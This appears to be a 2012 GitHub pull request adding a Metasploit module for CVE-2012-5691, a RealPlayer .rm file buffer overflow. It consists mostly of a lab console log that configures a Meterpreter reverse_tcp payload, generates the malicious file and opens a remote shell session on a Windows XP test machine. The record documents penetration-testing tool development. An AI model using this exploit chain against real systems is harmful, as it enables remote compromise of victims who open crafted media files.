Added module for CVE-2012-5691 #1209

merged 2 commits into from Dec 26, 2012
jvazquez-r7
Contributor

Initially published by suto via Twitter:

https://twitter.com/toanphamvan/status/283388481873539072

Tested on Windows XP SP3 / Real Player 15.0.5.109 (http://www.oldversion.com/windows/realplayer-15-0-5-109)

msf  exploit(real_player_rm_bof) > show options

Module options (exploit/windows/fileformat/real_player_rm_bof):

   Name      Current Setting  Required  Description
   ----      ---------------  --------  -----------
   FILENAME  msf.rm           no        The file name.


Payload options (windows/meterpreter/reverse_tcp):

   Name      Current Setting  Required  Description
   ----      ---------------  --------  -----------
   EXITFUNC  process          yes       Exit technique: seh, thread, process, none
   LHOST     192.168.1.128    yes       The listen address
   LPORT     4444             yes       The listen port


Exploit target:

   Id  Name
   --  ----
   0   Windows XP SP3 / Real Player 15.0.5.109


msf  exploit(real_player_rm_bof) > rexploit
[*] Reloading module...

[+] msf.rm stored at /Users/juan/.msf4/local/msf.rm
msf  exploit(real_player_rm_bof) > use exploit/multi/handler 
msf  exploit(handler) > rexploit
[*] Reloading module...

[*] Started reverse handler on 192.168.1.128:4444 
[*] Starting the payload handler...
[*] Sending stage (752128 bytes) to 192.168.1.147
[*] Meterpreter session 1 opened (192.168.1.128:4444 -> 192.168.1.147:1128) at 2012-12-25 18:01:20 +0100

meterpreter > sysinfo
Computer        : JUAN-C0DE875735
OS              : Windows XP (Build 2600, Service Pack 3).
Architecture    : x86
System Language : en_US
Meterpreter     : x86/win32
meterpreter > exit
[*] Shutting down Meterpreter...

[*] 192.168.1.147 - Meterpreter session 1 closed.  Reason: User exit

wchen-r7 merged commit e895ccb into rapid7:master on Dec 26, 2012
jvazquez-r7 deleted the realplayer_url_bof branch on November 18, 2014 15:54